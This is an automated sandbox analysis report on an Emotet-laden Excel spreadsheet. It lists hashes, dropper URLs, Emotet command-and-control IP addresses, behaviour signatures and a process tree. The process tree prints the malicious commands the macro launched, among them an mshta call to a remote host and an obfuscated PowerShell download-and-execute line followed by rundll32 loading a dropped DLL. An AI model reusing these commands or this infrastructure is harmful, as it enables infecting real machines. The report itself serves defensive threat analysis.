Analysis

  • max time kernel
    115s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 03:27

General

  • Target

    tmpsopwvsay.xls

  • Size

    154KB

  • MD5

    cfcd5a0c1e19d415fc69a3632d009c0b

  • SHA1

    df57263f0005eedbfe32f41bb3cfe0ded32a8351

  • SHA256

    be0a2a7c762118fb87c70042ade21a1fa3d658e14ad2ce17e0f35996c435cf58

  • SHA512

    f17e410a1764b22e6d0d93865f5fc61a2d2558e13e76fcabe250e05ea8c789b12e25bdd9b266dd6b76d7f6dd6dfac9e09a183f06f270c3e53b6b7d0ccb3e9a6d

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/qqqw/aaas/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/qqqw/aaas/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tmpsopwvsay.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c mshta http://91.240.118.168/qqqw/aaas/se.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3264
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/qqqw/aaas/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:60
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 60 -s 1656
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqqw/aaas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3640
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2596
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1256
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:3792
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Grrzoppuqxq\lpyzn.bam",AMAspkGE
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1584
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Grrzoppuqxq\lpyzn.bam",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1612

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    2c05321ef3ac468ec85717080ed0094c

    SHA1

    dc7ac78ce5d32d6716cc7aa2c34f829d1d34f68e

    SHA256

    1bd58cb752abdb6f374c52f190b463628d3efacade6db9ff6af8afea2f47247d

    SHA512

    0f70c4ebe9b95ef8534d0631f1242df74365c6c9342f61b8bc9c5c1d3b3b55a6e59dde77a900bc1b8e0033447f747c772b25061948ba816286f3186a8e6e86d7

  • \ProgramData\QWER.dll
    MD5

    2c05321ef3ac468ec85717080ed0094c

    SHA1

    dc7ac78ce5d32d6716cc7aa2c34f829d1d34f68e

    SHA256

    1bd58cb752abdb6f374c52f190b463628d3efacade6db9ff6af8afea2f47247d

    SHA512

    0f70c4ebe9b95ef8534d0631f1242df74365c6c9342f61b8bc9c5c1d3b3b55a6e59dde77a900bc1b8e0033447f747c772b25061948ba816286f3186a8e6e86d7

  • \ProgramData\QWER.dll
    MD5

    2c05321ef3ac468ec85717080ed0094c

    SHA1

    dc7ac78ce5d32d6716cc7aa2c34f829d1d34f68e

    SHA256

    1bd58cb752abdb6f374c52f190b463628d3efacade6db9ff6af8afea2f47247d

    SHA512

    0f70c4ebe9b95ef8534d0631f1242df74365c6c9342f61b8bc9c5c1d3b3b55a6e59dde77a900bc1b8e0033447f747c772b25061948ba816286f3186a8e6e86d7

  • memory/1256-323-0x00000000043C0000-0x00000000043E7000-memory.dmp
    Filesize

    156KB

  • memory/1584-340-0x0000000003530000-0x0000000003557000-memory.dmp
    Filesize

    156KB

  • memory/1612-343-0x0000000002B40000-0x0000000002B67000-memory.dmp
    Filesize

    156KB

  • memory/2660-124-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-118-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-597-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-596-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-595-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-594-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-132-0x00007FF88FA70000-0x00007FF88FA80000-memory.dmp
    Filesize

    64KB

  • memory/2660-131-0x00007FF88FA70000-0x00007FF88FA80000-memory.dmp
    Filesize

    64KB

  • memory/2660-121-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-120-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/2660-119-0x00007FF893410000-0x00007FF893420000-memory.dmp
    Filesize

    64KB

  • memory/3640-276-0x000001497D150000-0x000001497D172000-memory.dmp
    Filesize

    136KB

  • memory/3640-316-0x000001497D246000-0x000001497D248000-memory.dmp
    Filesize

    8KB

  • memory/3640-311-0x000001497D960000-0x000001497D9D6000-memory.dmp
    Filesize

    472KB

  • memory/3640-297-0x000001497D1C0000-0x000001497D1FC000-memory.dmp
    Filesize

    240KB

  • memory/3640-294-0x000001497D243000-0x000001497D245000-memory.dmp
    Filesize

    8KB

  • memory/3640-293-0x000001497D240000-0x000001497D242000-memory.dmp
    Filesize

    8KB

  • memory/3792-331-0x0000000004870000-0x0000000004897000-memory.dmp
    Filesize

    156KB

  • memory/3792-333-0x00000000049D0000-0x00000000049F7000-memory.dmp
    Filesize

    156KB

  • memory/3792-335-0x0000000004A30000-0x0000000004A57000-memory.dmp
    Filesize

    156KB

  • memory/3792-337-0x0000000004A90000-0x0000000004AB7000-memory.dmp
    Filesize

    156KB

  • memory/3792-339-0x0000000004C50000-0x0000000004C77000-memory.dmp
    Filesize

    156KB

  • memory/3792-329-0x00000000046B0000-0x00000000046D7000-memory.dmp
    Filesize

    156KB